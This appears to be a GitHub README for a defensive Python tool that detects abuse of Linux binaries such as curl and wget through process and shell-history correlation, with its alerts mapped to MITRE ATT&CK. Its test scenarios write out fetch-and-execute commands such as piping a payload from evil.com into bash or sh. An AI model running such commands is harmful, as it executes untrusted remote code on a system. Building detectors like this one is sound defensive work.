Skip to content

Cyber-30/LOLBins-Detection-Tool

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
bash
bash
 
 
config
config
 
 
logs
logs
 
 
monitor
monitor
 
 
main.py
main.py
 
 
readme.md
readme.md
 
 

Repository files navigation

🛡️ LOLBins Detection Tool (Linux)

A behavior-based detection tool that identifies malicious abuse of Living-Off-The-Land Binaries (LOLBins) such as curl, wget, bash, and sh on Linux systems.

This project focuses on real attacker behavior, not signatures, combining:

  • Process monitoring
  • Shell history analysis
  • Temporal process correlation
  • MITRE ATT&CK mapping
  • False-positive reduction

🧠 What are LOLBins?

Living-Off-The-Land Binaries (LOLBins) are legitimate system tools that attackers abuse to:

  • Download payloads
  • Execute remote code
  • Evade detection

Examples:

curl | bash
wget -O- | sh

🚀 Features

✅ Process Monitoring

  • Monitors running processes using psutil

  • Logs executions of common LOLBins

✅ Shell History Analysis

  • Reads new .bash_history entries only

  • Detects dangerous patterns like:

curl http://evil.com/payload.sh | bash

✅ Temporal Process Correlation

  • Detects suspicious chains like:
curl → bash (within 2 seconds)
  • Requires execution intent (pipe, -O-, payload indicators)

✅ False-Positive Reduction

  • Trusted domains are suppressed

  • Benign interactive shells do not trigger alerts

✅ MITRE ATT&CK Mapping

Alerts are mapped to:

  • T1105 – Ingress Tool Transfer

  • T1059 – Command and Scripting Interpreter

  • T1059.004 – Unix Shell

✅ Explainable Alerts

Each alert includes:

  • Exact command

  • Downloader → shell relationship

  • MITRE techniques

⚙️ Requirements

  • Python 3.8+

  • Linux OS

  • Dependency:

pip install -r requirements.txt

Test Scenario

Benign Command

curl https://example.com

✔ Logged as INFO ❌ No alert

Malicious Execution

curl http://evil.com/payload.sh | bash

🚨 Alert:

[HIGH] process-chain | downloader followed by shell | bash | MITRE=T1105,T1059

Advance Abuse:

wget http://evil.com/payload.sh -O- | sh

🚨 HIGH severity alert

📄 Log Files process.log

Raw process telemetry:

PID | binary | command

info.log

Benign LOLBin usage:

[INFO] curl | {...}

alerts.log

Confirmed malicious behavior:

[HIGH] process-chain | curl ... -> bash | MITRE=T1105,T1059

🧠 Detection Logic Summary

Behavior Alert
curl only
interactive bash
trusted domains
curl | bash
wget -O- | sh

🧩 MITRE ATT&CK Techniques

Technique Description
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
T1059.004 Unix Shell

About

Built a Python-based LOLBins detection tool to identify malicious abuse of legitimate Linux binaries using behavior-based analysis. The tool correlates process activity and shell history, detects suspicious execution chains, and maps alerts to MITRE ATT&CK techniques to support threat hunting and SOC workflows.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages